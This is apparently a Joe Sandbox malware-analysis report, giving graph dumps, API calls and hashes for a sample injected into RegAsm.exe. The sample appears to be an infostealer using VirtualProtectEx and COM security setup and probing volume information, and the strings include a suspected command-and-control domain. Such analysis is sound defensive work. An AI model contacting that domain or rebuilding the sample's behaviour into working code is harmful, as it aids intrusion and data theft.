                                                                  control_flow_graph 37 2b60c40-2b60c9b 40 2b60d07-2b60d15 37->40 41 2b60c9d-2b60cb6 37->41 42 2b60da4-2b60db7 40->42 43 2b60d1b 40->43 48 2b60f0d-2b60f87 41->48 57 2b60cbc-2b60cdd 41->57 45 2b60f03-2b60f0a 42->45 46 2b60dbd-2b60dc6 42->46 47 2b60d1e-2b60d23 43->47 50 2b60dcf-2b60dda 46->50 51 2b60dc8-2b60dce 46->51 47->48 49 2b60d29-2b60d39 47->49 68 2b60fdb-2b61027 48->68 69 2b60f89-2b60fae 48->69 49->48 52 2b60d3f-2b60d4b 49->52 50->48 54 2b60de0-2b60dec 50->54 51->50 55 2b60d54-2b60d5b 52->55 56 2b60d4d-2b60d53 52->56 59 2b60df5-2b60dfc 54->59 60 2b60dee-2b60df4 54->60 55->48 61 2b60d61-2b60d6b 55->61 56->55 57->48 62 2b60ce3-2b60cf1 57->62 59->48 64 2b60e02-2b60e0c 59->64 60->59 61->48 66 2b60d71-2b60d7b 61->66 62->48 67 2b60cf7-2b60d05 62->67 64->48 65 2b60e12-2b60e1c 64->65 65->48 70 2b60e22-2b60e28 65->70 66->48 71 2b60d81-2b60d87 66->71 67->40 67->41 85 2b61030-2b61068 68->85 86 2b61029-2b6102f 68->86 69->68 76 2b60fb0-2b60fb2 69->76 70->48 72 2b60e2e-2b60e3a 70->72 71->48 73 2b60d8d-2b60d9e 71->73 72->48 77 2b60e40-2b60e51 72->77 73->42 73->47 78 2b60fb4-2b60fbe 76->78 79 2b60fd5-2b60fd8 76->79 80 2b60e53-2b60e59 77->80 81 2b60e5a-2b60eb4 77->81 83 2b60fc2-2b60fd1 78->83 84 2b60fc0 78->84 79->68 80->81 102 2b60eb6-2b60ec0 81->102 103 2b60ee5-2b60eea 81->103 83->83 87 2b60fd3 83->87 84->83 93 2b6106a-2b6106e 85->93 94 2b61078 85->94 86->85 87->79 93->94 95 2b61070-2b61073 call 2b60260 93->95 98 2b61079 94->98 95->94 98->98 102->103 104 2b60ec2-2b60eda 102->104 107 2b60ef1-2b60efd 103->107 104->103 105 2b60edc-2b60ee3 104->105 105->107 107->45 107->46
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8931af5fd1b254b5126aae21598f879d19b9e8a96944c5dd275617a438abedb7
                                                                  • Instruction ID: 3f0451c98f8db38d96b47804c014bf079dcc05b8087778d360f2c071342d9576
                                                                  • Opcode Fuzzy Hash: 8931af5fd1b254b5126aae21598f879d19b9e8a96944c5dd275617a438abedb7
                                                                  • Instruction Fuzzy Hash: 9BD18A70A042599FCB01DFA9C8947EDFBF2BF48314F2489A9E855E7255C739AC41CBA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 23 2b61218-2b612ad VirtualProtectEx 26 2b612b4-2b612d5 23->26 27 2b612af 23->27 27->26
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02B612A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 7ae1a39d0431eceae6b73454ddc62abc205a5f21cf04842c12939140fa54eb14
                                                                  • Instruction ID: a0f81f6c7e0c7f8bc8ccbe7c88114824b286ac56e4746d3ab54942605cd27eeb
                                                                  • Opcode Fuzzy Hash: 7ae1a39d0431eceae6b73454ddc62abc205a5f21cf04842c12939140fa54eb14
                                                                  • Instruction Fuzzy Hash: 562104B1D102599FDB10DFAAD884AEEBBF1FF88314F10842AE959A7250C7795904CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 30 2b61220-2b612ad VirtualProtectEx 33 2b612b4-2b612d5 30->33 34 2b612af 30->34 34->33
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02B612A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2204414975.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2b60000_FoS5cjKhd3.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: a0d4b658af6bd46268db0595c72e2438b3ee795bee09955795362e3c4bf965e6
                                                                  • Instruction ID: e3fa0247554c5ffb03f323f1ecbb87424c2972ba6cb038164e8f032144f104d6
                                                                  • Opcode Fuzzy Hash: a0d4b658af6bd46268db0595c72e2438b3ee795bee09955795362e3c4bf965e6
                                                                  • Instruction Fuzzy Hash: AA2127B1D002599FDB10DFAAC884ADEFBF5FF48314F10841AE959A7250C7795900CFA5

                                                                  Execution Graph

                                                                  Execution Coverage:1.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:61.9%
                                                                  Total number of Nodes:155
                                                                  Total number of Limit Nodes:23
                                                                  execution_graph 19222 40d470 19223 40d479 19222->19223 19224 40d481 GetInputState 19223->19224 19225 40d64e ExitProcess 19223->19225 19226 40d48e 19224->19226 19227 40d496 GetCurrentThreadId GetCurrentProcessId 19226->19227 19228 40d649 19226->19228 19230 40d4c6 19227->19230 19265 447110 19228->19265 19230->19228 19234 412450 CoInitialize 19230->19234 19232 40d644 19264 410680 FreeLibrary 19232->19264 19235 412580 19234->19235 19236 412883 CoUninitialize 19234->19236 19237 412893 GetSystemDirectoryW 19234->19237 19238 412889 19234->19238 19239 41286f 19234->19239 19240 41255e CoInitializeSecurity 19234->19240 19268 4402a0 19235->19268 19236->19238 19242 4128bd 19237->19242 19238->19232 19239->19236 19239->19238 19240->19235 19240->19236 19240->19237 19240->19238 19240->19239 19271 444490 19242->19271 19244 4128f6 19244->19236 19244->19238 19248 412cca 19244->19248 19275 429700 19248->19275 19250 412ec1 19285 42c060 19250->19285 19264->19228 19334 4486b0 19265->19334 19267 447115 FreeLibrary 19267->19225 19269 44030a 19268->19269 19270 440367 CoCreateInstance 19269->19270 19270->19269 19270->19270 19272 444526 19271->19272 19273 4444a8 19271->19273 19274 44452c RtlFreeHeap 19271->19274 19272->19274 19273->19244 19276 42970e 19275->19276 19296 44b320 19276->19296 19278 4297ef 19280 4298db 19278->19280 19281 4296d2 19278->19281 19283 429569 19278->19283 19300 44b720 19278->19300 19308 44b430 19280->19308 19281->19250 19281->19281 19290 4230f0 19283->19290 19287 42c094 19285->19287 19289 42c2a1 19285->19289 19286 44b320 LdrInitializeThunk 19286->19289 19288 44b320 LdrInitializeThunk 19287->19288 19288->19289 19289->19286 19291 423100 19290->19291 19316 44ad90 19291->19316 19293 423180 19293->19281 19294 423159 19294->19293 19320 425fd0 19294->19320 19298 44b340 19296->19298 19297 44b3ff 19297->19278 19298->19297 19329 4476d0 LdrInitializeThunk 19298->19329 19302 44b746 19300->19302 19301 44b9e1 19301->19278 19305 44b79e 19302->19305 19330 4476d0 LdrInitializeThunk 19302->19330 19304 444490 RtlFreeHeap 19304->19301 19305->19301 19307 44b85e 19305->19307 19331 4476d0 LdrInitializeThunk 19305->19331 19307->19304 19307->19307 19310 44b456 19308->19310 19309 44b709 19309->19281 19312 44b4ae 19310->19312 19332 4476d0 LdrInitializeThunk 19310->19332 19312->19309 19314 44b5ce 19312->19314 19333 4476d0 LdrInitializeThunk 19312->19333 19313 444490 RtlFreeHeap 19313->19309 19314->19313 19317 44adb0 19316->19317 19318 44aede 19317->19318 19323 4476d0 LdrInitializeThunk 19317->19323 19318->19294 19324 44abe0 19320->19324 19322 42601e 19323->19318 19325 44ac00 19324->19325 19326 44ad3e 19325->19326 19328 4476d0 LdrInitializeThunk 19325->19328 19326->19322 19328->19326 19329->19297 19330->19305 19331->19307 19332->19312 19333->19314 19335 4486b9 19334->19335 19335->19267 19336 4403d5 19337 44044b SysAllocString 19336->19337 19338 44041d 19336->19338 19339 440477 19337->19339 19338->19337 19340 40f042 19345 40f06f 19340->19345 19341 40f3b6 19343 40fa20 RtlFreeHeap 19341->19343 19344 40f123 19343->19344 19345->19341 19345->19344 19346 40fa20 19345->19346 19348 40fa5a 19346->19348 19352 410690 19348->19352 19349 40fd54 19349->19341 19350 444490 RtlFreeHeap 19350->19349 19351 40fc3d 19351->19349 19351->19350 19355 4108fa 19352->19355 19353 410a6f 19353->19351 19354 447130 RtlFreeHeap 19354->19355 19355->19353 19355->19354 19357 410a61 19355->19357 19356 444490 RtlFreeHeap 19356->19357 19357->19353 19357->19356 19358 440487 CoSetProxyBlanket 19364 447d38 19365 447d47 19364->19365 19367 447dce 19364->19367 19365->19367 19368 4476d0 LdrInitializeThunk 19365->19368 19367->19367 19368->19367 19369 410e0c 19370 410e54 19369->19370 19372 410a7b 19369->19372 19370->19370 19371 444490 RtlFreeHeap 19371->19372 19372->19370 19372->19371 19373 447ac9 19374 447af9 19373->19374 19376 447a08 19374->19376 19377 4476d0 LdrInitializeThunk 19374->19377 19377->19376 19383 4404ab 19384 4404d3 19383->19384 19385 44050b SysAllocString 19383->19385 19384->19385 19386 440599 19385->19386 19387 4405cb SysAllocString 19385->19387 19386->19387 19388 4405f7 19387->19388 19389 440906 19388->19389 19390 440726 SysStringLen 19388->19390 19391 440913 SysFreeString SysFreeString 19388->19391 19392 440653 VariantInit 19388->19392 19393 4408ee VariantClear 19388->19393 19405 440720 19388->19405 19389->19391 19390->19405 19394 440939 SysFreeString 19391->19394 19395 4406b5 19392->19395 19393->19389 19396 440950 19394->19396 19395->19390 19395->19393 19395->19405 19397 440968 GetVolumeInformationW 19396->19397 19398 440b85 19397->19398 19399 440a67 19397->19399 19403 440b3e 19397->19403 19406 440c12 19397->19406 19410 440989 19397->19410 19401 444490 RtlFreeHeap 19398->19401 19400 444490 RtlFreeHeap 19400->19406 19408 440b8b 19401->19408 19403->19398 19403->19399 19403->19406 19416 4448b0 19403->19416 19420 444750 19403->19420 19424 444970 19403->19424 19406->19400 19409 440dcc 19406->19409 19408->19406 19432 4476d0 LdrInitializeThunk 19408->19432 19433 4476d0 LdrInitializeThunk 19409->19433 19410->19398 19410->19399 19410->19403 19410->19406 19415 4476d0 LdrInitializeThunk 19410->19415 19414 440ddb 19415->19403 19417 44493e 19416->19417 19418 4448c0 19416->19418 19417->19403 19418->19417 19434 4476d0 LdrInitializeThunk 19418->19434 19421 444761 19420->19421 19422 44481e 19420->19422 19421->19422 19435 4476d0 LdrInitializeThunk 19421->19435 19422->19403 19425 444986 19424->19425 19429 444a23 19424->19429 19425->19429 19430 444a1e 19425->19430 19436 4476d0 LdrInitializeThunk 19425->19436 19426 444b7e 19427 4448b0 LdrInitializeThunk 19426->19427 19426->19429 19427->19429 19429->19403 19430->19426 19437 4476d0 LdrInitializeThunk 19430->19437 19432->19406 19433->19414 19434->19417 19435->19422 19436->19430 19437->19426

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4404ab-4404d1 1 4404d3 0->1 2 44050b-440597 SysAllocString 0->2 5 4404e0-440509 call 444170 1->5 3 440599 2->3 4 4405cb-4405fc SysAllocString 2->4 7 4405a0-4405c9 call 4441e0 3->7 12 4408c5-4408d8 4->12 13 440906-44090f 4->13 14 440726-44074e SysStringLen 4->14 15 440720 4->15 16 4408a0-4408be 4->16 17 440913-440982 SysFreeString * 3 call 44a230 GetVolumeInformationW 4->17 18 440603-44062b 4->18 19 440653-4406b3 VariantInit 4->19 20 4408ee-440902 VariantClear 4->20 21 4408df 4->21 5->2 7->4 12->12 12->16 12->21 13->17 22 440750-440752 14->22 23 440791 14->23 16->12 16->21 46 440b85-440baf call 444490 17->46 47 440d26-440d50 call 444490 17->47 48 440a67-440a6e 17->48 49 4409c0-4409cf 17->49 50 440a40-440a4d 17->50 51 440c40-440c61 call 4448b0 17->51 52 440c68-440cd4 call 444730 call 444750 17->52 53 440989-44099e 17->53 54 440aaa-440ab7 17->54 55 440a54-440a60 17->55 56 4409d6 17->56 57 440c17-440c2a 17->57 58 4409b0-4409b9 17->58 59 440b7f 17->59 60 440ab8-440ae8 call 4443f0 17->60 61 4409d9-440a04 call 437cd0 17->61 62 440cdb-440cf1 call 444970 17->62 28 44062f-44064c 18->28 24 4406b5 19->24 25 4406eb-4406fd 19->25 20->13 27 440766-44076d 22->27 29 440793-4407af call 40cc70 23->29 30 4406c0-4406e9 call 444270 24->30 32 440701-440714 25->32 27->29 33 44076f-44078b 27->33 28->12 28->13 28->14 28->15 28->16 28->19 28->20 28->21 40 4407b5-4407be 29->40 41 440886-440897 29->41 30->25 32->12 32->14 32->15 32->16 32->20 32->21 37 440754-440764 33->37 38 44078d-44078f 33->38 37->27 37->29 38->37 40->41 43 4407c4-4407d3 40->43 41->12 41->16 41->21 45 4407d6-4407dd 43->45 45->41 66 4407e3-4407eb 45->66 82 440be6-440bed 46->82 83 440bb1 46->83 80 440d86-440d8d 47->80 81 440d52 47->81 49->46 49->47 49->50 49->51 49->52 49->54 49->55 49->56 49->57 49->59 49->60 49->61 49->62 50->46 50->47 50->50 50->51 50->52 50->54 50->55 50->57 50->59 50->60 50->62 51->46 51->47 51->52 51->54 51->59 51->62 52->46 52->47 52->51 52->54 52->62 53->46 53->47 53->48 53->49 53->50 53->51 53->52 53->54 53->55 53->56 53->57 53->58 53->59 53->60 53->61 53->62 55->46 55->47 55->48 55->49 55->50 55->51 55->52 55->54 55->55 55->56 55->57 55->58 55->59 55->60 55->61 55->62 56->61 57->46 57->47 57->51 57->52 57->54 57->59 57->62 58->46 58->47 58->49 58->50 58->51 58->52 58->54 58->55 58->56 58->57 58->59 58->60 58->61 58->62 89 440b16-440b22 60->89 90 440aea 60->90 84 440a10-440a17 61->84 62->51 73 4407f6-44080e 66->73 74 4407ed-4407f4 66->74 86 440834-440841 73->86 87 440810-440815 73->87 85 44086a-440870 74->85 96 440d20 80->96 97 440d8f-440d9b 80->97 94 440d60-440d84 call 443a50 81->94 82->47 103 440bf3-440bff 82->103 99 440bc0-440be4 call 443a50 83->99 84->84 93 440a19-440a34 84->93 85->41 101 440872-440880 85->101 86->85 98 440843-440865 86->98 87->86 95 440817-440832 87->95 91 440b24-440b2f 89->91 92 440b67-440b78 89->92 102 440af0-440b14 call 443a50 90->102 104 440b30-440b37 91->104 92->46 92->47 92->51 92->52 92->54 92->57 92->59 92->62 93->46 93->47 93->50 93->51 93->52 93->54 93->55 93->57 93->59 93->60 93->62 94->80 95->85 96->47 106 440da0-440da7 97->106 98->85 99->82 101->41 101->45 102->89 108 440c00-440c07 103->108 112 440b40-440b46 104->112 113 440b39-440b3c 104->113 115 440dc0-440dc6 106->115 116 440da9-440dac 106->116 110 440cf6-440cfc 108->110 111 440c0d-440c10 108->111 110->47 120 440cfe-440d10 call 4476d0 110->120 111->108 123 440c12 111->123 112->92 124 440b48-440b64 call 4476d0 112->124 113->104 119 440b3e 113->119 115->96 122 440dcc-440ddb call 4476d0 115->122 116->106 121 440dae 116->121 119->92 120->47 120->96 121->96 123->47 124->92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocString$InitVariant
                                                                  • String ID: 4`[b$4`[b$<],[
                                                                  • API String ID: 3074814690-2254285042
                                                                  • Opcode ID: 0ea8b8889e0bb4a45b6034501902803b8855704a2f451e5abac1be5342d0fdbe
                                                                  • Instruction ID: 3b70daff5964ce097363bec6f93c74fecd6cdfee96da66d185794e42f4892200
                                                                  • Opcode Fuzzy Hash: 0ea8b8889e0bb4a45b6034501902803b8855704a2f451e5abac1be5342d0fdbe
                                                                  • Instruction Fuzzy Hash: 6022CA756083409FE714DF28D880B2FBBE1FF85309F14882DE6858B2A1D739E955CB5A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 131 412450-412557 CoInitialize 132 412580-412588 call 4402a0 131->132 133 412883 CoUninitialize 131->133 134 412893-4128bb GetSystemDirectoryW 131->134 135 412907-412910 call 403d60 131->135 136 412889-412892 131->136 137 412918 131->137 138 41286f-41287c 131->138 139 41255e-412579 CoInitializeSecurity 131->139 146 41258d-4125b2 132->146 133->136 141 4128c2-4128c6 134->141 142 4128bd-4128c0 134->142 135->137 138->133 138->135 138->137 139->132 139->133 139->134 139->135 139->137 139->138 145 4128c9-4128d1 141->145 142->141 142->145 147 4128d3-4128d6 145->147 148 4128d8 145->148 149 4125e4-41262f 146->149 150 4125b4 146->150 147->148 153 4128d9-412900 call 40cc70 call 440df0 call 444490 147->153 148->153 151 412631 149->151 152 412666-412675 149->152 154 4125c0-4125e2 call 41ae40 150->154 155 412640-412664 call 41ade0 151->155 156 412677-41267a 152->156 157 41268b-412699 152->157 153->133 153->135 153->137 185 412cca-412cfa call 404860 153->185 154->149 155->152 161 412680-412689 156->161 162 4126ab-4126b3 157->162 163 41269b-41269f 157->163 161->157 161->161 168 4126b5-4126b8 162->168 169 4126cb-4126d3 162->169 167 4126a0-4126a9 163->167 167->162 167->167 171 4126c0-4126c9 168->171 173 4126d5-4126d9 169->173 174 4126ed 169->174 171->169 171->171 177 4126e0-4126e9 173->177 175 4126f0-4127ba 174->175 179 4127ea-412814 175->179 180 4127bc-4127bf 175->180 177->177 178 4126eb 177->178 178->175 183 412847-412868 call 410690 179->183 184 412816 179->184 182 4127c0-4127e8 call 41af40 180->182 182->179 183->133 183->134 183->135 183->137 183->138 188 412820-412845 call 41aec0 184->188 194 412d2a-412d3b call 4049b0 185->194 195 412cfc-412cff 185->195 188->183 202 412d51-412d74 194->202 203 412d42-412d4a call 43f960 194->203 197 412d00-412d28 call 41afc0 195->197 197->194 204 412d76 202->204 205 412daa-412dcd call 4049b0 202->205 203->185 203->202 208 412d80-412da8 call 41b040 204->208 213 412dfa-412e1d call 4049b0 205->213 214 412dcf 205->214 208->205 219 412e4a-412f42 call 4049b0 call 4135c0 call 404e10 call 40d910 call 4289f0 call 40e180 call 40d910 call 429390 call 40e180 call 40d910 call 429700 call 40e180 call 40d910 call 42c060 call 42cad0 call 42ced0 call 42fcc0 call 40e180 call 40d910 call 42ede0 call 40e180 call 40d910 call 432830 call 439bd0 213->219 220 412e1f 213->220 215 412dd0-412df8 call 41b0c0 214->215 215->213 273 412f52-412f89 call 40e180 CoUninitialize 219->273 274 412f49-412f4f call 439d40 219->274 275 4132cf-4132d5 219->275 222 412e20-412e48 call 41b140 220->222 222->219 282 412f8b 273->282 283 412fba-412fdc 273->283 274->273 280 4132f2-4132fa call 404e10 275->280 287 412f90-412fb8 call 41b2b0 282->287 284 413004-413055 283->284 285 412fde-412fdf 283->285 289 413057 284->289 290 41308a-413092 284->290 288 412fe0-413002 call 41b240 285->288 287->283 288->284 293 413060-413088 call 41b1c0 289->293 294 413094-413098 290->294 295 4130ab-4130b6 290->295 293->290 299 4130a0-4130a9 294->299 300 4130b8-4130bf 295->300 301 4130cd 295->301 299->295 299->299 304 4130c0-4130c9 300->304 302 4130d0-4130db 301->302 305 4130eb-4130f6 302->305 306 4130dd-4130df 302->306 304->304 307 4130cb 304->307 309 4130f8-4130f9 305->309 310 41310b-413113 305->310 308 4130e0-4130e9 306->308 307->302 308->305 308->308 311 413100-413109 309->311 312 413115-413119 310->312 313 41312d 310->313 311->310 311->311 314 413120-413129 312->314 315 413130-41313c 313->315 314->314 316 41312b 314->316 317 413151-413219 315->317 318 41313e 315->318 316->315 319 413247-413274 317->319 320 41321b 317->320 321 413140-41314d 318->321 323 413276 319->323 324 4132aa-4132c8 call 410690 319->324 322 413220-413245 call 41b390 320->322 321->321 325 41314f 321->325 322->319 327 413280-4132a8 call 41b320 323->327 324->273 324->274 324->275 324->280 325->317 327->324
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0041254E
                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00412570
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0041289E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Initialize$DirectorySecuritySystem
                                                                  • String ID: 25A2D0757F90F419EC62ECD0B10FDE23$gutterydhowi.shop$q-s
                                                                  • API String ID: 1379780170-1544957592
                                                                  • Opcode ID: 574801d40f12a725b9c9cb71e3c2e1c5558239a08317548fb3447c718f303320
                                                                  • Instruction ID: e90c699da80fdbf97deba592771adfca9ffecd6f7c132f23d46d425fcbc939e9
                                                                  • Opcode Fuzzy Hash: 574801d40f12a725b9c9cb71e3c2e1c5558239a08317548fb3447c718f303320
                                                                  • Instruction Fuzzy Hash: AA62D0B45007419FD3219F26D481627BBF1FF06308F14495DE4DA8BBA2D33AE896CB99

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 333 4408e6-440982 call 40cc80 VariantClear SysFreeString * 3 call 44a230 GetVolumeInformationW 343 440b85-440baf call 444490 333->343 344 440d26-440d50 call 444490 333->344 345 440a67-440a6e 333->345 346 4409c0-4409cf 333->346 347 440a40-440a4d 333->347 348 440c40-440c61 call 4448b0 333->348 349 440c68-440cd4 call 444730 call 444750 333->349 350 440989-44099e 333->350 351 440aaa-440ab7 333->351 352 440a54-440a60 333->352 353 4409d6 333->353 354 440c17-440c2a 333->354 355 4409b0-4409b9 333->355 356 440b7f 333->356 357 440ab8-440ae8 call 4443f0 333->357 358 4409d9-440a04 call 437cd0 333->358 359 440cdb-440cf1 call 444970 333->359 376 440be6-440bed 343->376 377 440bb1 343->377 374 440d86-440d8d 344->374 375 440d52 344->375 346->343 346->344 346->347 346->348 346->349 346->351 346->352 346->353 346->354 346->356 346->357 346->358 346->359 347->343 347->344 347->347 347->348 347->349 347->351 347->352 347->354 347->356 347->357 347->359 348->343 348->344 348->349 348->351 348->356 348->359 349->343 349->344 349->348 349->351 349->359 350->343 350->344 350->345 350->346 350->347 350->348 350->349 350->351 350->352 350->353 350->354 350->355 350->356 350->357 350->358 350->359 352->343 352->344 352->345 352->346 352->347 352->348 352->349 352->351 352->352 352->353 352->354 352->355 352->356 352->357 352->358 352->359 353->358 354->343 354->344 354->348 354->349 354->351 354->356 354->359 355->343 355->344 355->346 355->347 355->348 355->349 355->351 355->352 355->353 355->354 355->356 355->357 355->358 355->359 380 440b16-440b22 357->380 381 440aea 357->381 378 440a10-440a17 358->378 359->348 386 440d20 374->386 387 440d8f-440d9b 374->387 385 440d60-440d84 call 443a50 375->385 376->344 391 440bf3-440bff 376->391 388 440bc0-440be4 call 443a50 377->388 378->378 384 440a19-440a34 378->384 382 440b24-440b2f 380->382 383 440b67-440b78 380->383 390 440af0-440b14 call 443a50 381->390 392 440b30-440b37 382->392 383->343 383->344 383->348 383->349 383->351 383->354 383->356 383->359 384->343 384->344 384->347 384->348 384->349 384->351 384->352 384->354 384->356 384->357 384->359 385->374 386->344 394 440da0-440da7 387->394 388->376 390->380 396 440c00-440c07 391->396 400 440b40-440b46 392->400 401 440b39-440b3c 392->401 403 440dc0-440dc6 394->403 404 440da9-440dac 394->404 398 440cf6-440cfc 396->398 399 440c0d-440c10 396->399 398->344 408 440cfe-440d10 call 4476d0 398->408 399->396 411 440c12 399->411 400->383 412 440b48-440b64 call 4476d0 400->412 401->392 407 440b3e 401->407 403->386 410 440dcc-440ddb call 4476d0 403->410 404->394 409 440dae 404->409 407->383 408->344 408->386 409->386 411->344 412->383
                                                                  APIs
                                                                  • VariantClear.OLEAUT32(00000008), ref: 004408F3
                                                                  • SysFreeString.OLEAUT32(?), ref: 00440920
                                                                  • SysFreeString.OLEAUT32(?), ref: 00440929
                                                                  • SysFreeString.OLEAUT32(?), ref: 00440940
                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,571B4917,00000000,00000000,00000000,00000000), ref: 00440979
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeString$ClearInformationVariantVolume
                                                                  • String ID: 4`[b$4`[b
                                                                  • API String ID: 1909038640-3640500014
                                                                  • Opcode ID: e385970683e39f11de06317a4428018e5c6c996f516a19f857f1be5293d116c9
                                                                  • Instruction ID: 09d7fc534b87bbdf8393991c9ef56cf577bcdd1ce3a6edc29adcf294396d53e5
                                                                  • Opcode Fuzzy Hash: e385970683e39f11de06317a4428018e5c6c996f516a19f857f1be5293d116c9
                                                                  • Instruction Fuzzy Hash: CFB1CF756083009FE710DF64E891B2FB7E5EB8530AF14883DE685CB252D739E815CB5A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 419 40d470-40d47b call 446040 422 40d481-40d490 GetInputState call 43d9e0 419->422 423 40d64e-40d650 ExitProcess 419->423 426 40d496-40d4c4 GetCurrentThreadId GetCurrentProcessId 422->426 427 40d649 call 447110 422->427 428 40d4f6-40d513 426->428 429 40d4c6 426->429 427->423 432 40d515 428->432 433 40d546-40d548 428->433 431 40d4d0-40d4f4 call 40d660 429->431 431->428 437 40d520-40d544 call 40d6f0 432->437 434 40d5e6-40d60a 433->434 435 40d54e-40d56b 433->435 441 40d636-40d63d call 40efe0 434->441 442 40d60c-40d60f 434->442 438 40d596-40d5b3 435->438 439 40d56d-40d56f 435->439 437->433 438->434 446 40d5b5 438->446 445 40d570-40d594 call 40d780 439->445 441->427 453 40d63f call 412450 441->453 447 40d610-40d634 call 40d880 442->447 445->438 451 40d5c0-40d5e4 call 40d810 446->451 447->441 451->434 459 40d644 call 410680 453->459 459->427
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                  • String ID: mlon$qpsr
                                                                  • API String ID: 1029096631-2320206279
                                                                  • Opcode ID: 7930aff37ba72ce8264af3c29ed56ea6ce6d8b229feb210a3e04cfecf3ed9881
                                                                  • Instruction ID: 0b5985bc83f50576ef1f085b5a0d62e7e6efba06dbaf663de6811bcd9dd79fdb
                                                                  • Opcode Fuzzy Hash: 7930aff37ba72ce8264af3c29ed56ea6ce6d8b229feb210a3e04cfecf3ed9881
                                                                  • Instruction Fuzzy Hash: 7D416C7480C240ABD301BFA8D544A1EFBE5EF56705F148C2EE4C4A7392C23AC818CB6B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 461 447ac9-447af7 462 447b26-447b32 461->462 463 447af9 461->463 465 447b34-447b3f 462->465 466 447b82-447b87 462->466 464 447b00-447b24 call 448a50 463->464 464->462 475 447b40-447b47 465->475 467 447b95-447bb9 call 4480b0 466->467 468 447bc0-447bd3 466->468 469 447be0 466->469 470 447a70-447a8d 466->470 471 447be2-447c00 466->471 472 447b8e-447b90 466->472 473 447a08-447a22 466->473 467->468 467->469 467->470 467->471 467->473 468->469 469->471 476 447ab6-447ac4 470->476 477 447a8f 470->477 483 447c36-447c3d 471->483 484 447c02 471->484 478 447c7c-447c9a 472->478 481 447a24 473->481 482 447a56-447a69 473->482 485 447b50-447b56 475->485 486 447b49-447b4c 475->486 476->471 489 447a90-447ab4 call 448b30 477->489 491 447cc6-447cd0 478->491 492 447c9c-447c9f 478->492 494 447a30-447a54 call 448ac0 481->494 482->470 482->471 483->478 490 447c3f-447c4b 483->490 495 447c10-447c34 call 448a50 484->495 485->466 488 447b58-447b7a call 4476d0 485->488 486->475 487 447b4e 486->487 487->466 507 447b7f 488->507 489->476 499 447c50-447c5c 490->499 501 447cd2-447cdf 491->501 502 447cfc 491->502 500 447ca0-447cc4 call 448a50 492->500 494->482 495->483 514 447c5e 499->514 500->491 511 447ce0-447cec 501->511 505 447d03 502->505 506 447f5a-447f65 502->506 505->506 507->466 517 447cee 511->517 514->478 517->502
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
